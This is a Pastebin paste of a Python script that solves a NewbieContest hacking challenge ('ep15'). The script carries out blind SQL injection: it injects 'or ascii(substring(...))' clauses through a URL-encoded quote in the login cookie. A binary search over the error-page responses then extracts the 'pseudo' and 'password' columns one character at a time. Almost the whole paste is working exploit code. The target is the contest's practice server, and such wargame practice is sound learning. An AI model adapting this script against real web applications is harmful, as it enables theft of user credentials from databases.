xGeek

ep15 (NC)

Mar 1st, 2012
250
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.21 KB | None | 0 0
  1. #!/usr/bin/env python3
  2. # xGeek - NewbieContest ep15 (Blind SQLi)
  3. import urllib.request
  4.  
  5. def getColumn(column,expl,length = None):
  6.     if length is None:
  7.         length = 1
  8.         while not expl('or length({})={}'.format(column,length)):
  9.             length+=1
  10.  
  11.     # a fast dichotomic search ;)
  12.     debut = 48
  13.     fin = 122
  14.     data = ''
  15.     i = 1
  16.     while i <= length:
  17.         milieu = round((debut+fin)/2)
  18.         if expl('or ascii(substring({},{},1)) > {}'.format(column,i,milieu)):
  19.             debut = milieu+1
  20.         elif expl('or ascii(substring({},{},1)) < {}'.format(column,i,milieu)):
  21.             fin = milieu-1
  22.         else:
  23.             data += chr(milieu)
  24.             i += 1
  25.             debut = 48
  26.             fin = 122
  27.     return data
  28.  
  29. def exploit(sqli):
  30.     req = urllib.request.Request('http://hacking.newbiecontest.org:10080/ep15/index.php',None,{'Cookie':'pass=111;login=%2527 {} -- .'.format(sqli)})
  31.     try:
  32.         res = urllib.request.urlopen(req)
  33.     except urllib.error.HTTPError as err:
  34.         if err.geturl() == './erreur_pass.htm':
  35.             return True
  36.         else:
  37.             return False
  38.  
  39. print(getColumn('pseudo',exploit))
  40. print(getColumn('password',exploit))
Advertisement
Add Comment
Please, Sign In to add comment